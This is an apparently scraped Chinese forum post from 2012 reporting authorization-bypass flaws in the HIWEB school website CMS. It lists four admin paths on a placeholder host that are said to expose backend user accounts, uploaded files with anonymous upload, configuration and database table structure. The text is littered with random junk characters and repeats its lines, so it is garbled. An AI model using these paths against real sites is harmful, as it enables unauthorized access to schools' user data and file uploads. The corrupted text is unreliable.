HIWEB是一套整站管理系统,很多学校在用这个来搭站。但是此cms后台存在多处权限绕过的问题。+ U+ H' u( E$ `& B4 z' J, t. D, }# v
# A' u: f% @7 J9 _4 i# P3 V6 w
+ {- D1 b9 k# }3 G+ J+ u1. http://xxxx/hiwebcms/system/USER/
, b& @1 {( ^ X% E! y" A- x可以直接看到所有后台用户信息
; I$ R* d: t& h4 u& M' t 6 q& C; D- M" \$ l0 h9 F z5 q+ n
2. http://xxxx/hiwebcms/system/sysSetup/filesManage.htm" A/ H$ S( \# l$ ~: c4 U1 }9 M
可以查看所有上传的文件,匿名用户也可以上传文件。' |' i+ p, W$ A; F
9 N9 t7 [+ w3 b- `3 {- a& W) F
3. http://xxxx/hiwebcms/system/sysSetup/sysSetup.htm8 s5 l+ `* L0 n& { `* M- l
可以查看cms的部分配置
" M3 T( o+ V$ K6 |1 W0 _) w/ Q
7 q/ s) k' m% S4. http://xxxx/hiwebcms/system/USER/userConfig.htm
* G- G2 }& g! B2 X5 U- i1 Z. u查看数据库中部分表结构& e% @0 o+ A. f/ [
) j& D. O7 T9 z- \可以直接看到所有后台用户信息4 x' {: }4 n, D8 x
8 a2 q! x, F* _" } a5 A. j2 g) y( E0 \& e4 a; L6 r
* S2 D' h4 P* g8 V, ~/ Y7 J0 w可以查看所有上传的文件,匿名用户也可以上传文件。) W) N! c( N% d8 H B4 c8 j2 N' ~
[& a1 z7 Q# u
\9 X0 A4 H* g! a" n$ o
0 p7 k8 S6 s: u
- g& K) x. U, |8 ] e% a) D. i可以查看cms的部分配置0 S& h$ |5 t. z4 ^5 Z
: k0 v; y7 ^8 Z& h0 u% B. z& }3 `* X
: w" j' ]1 V% {& E5 e, k/ T7 R9 L8 _: C/ c
. e6 k3 V1 r, t f( z& W) z查看数据库中部分表结构
( I/ ` K7 J$ N' Q& @3 m
5 {: f2 Z7 G# E1 ` |
发表于 2012-12-20 08:19:46
收藏
支持
反对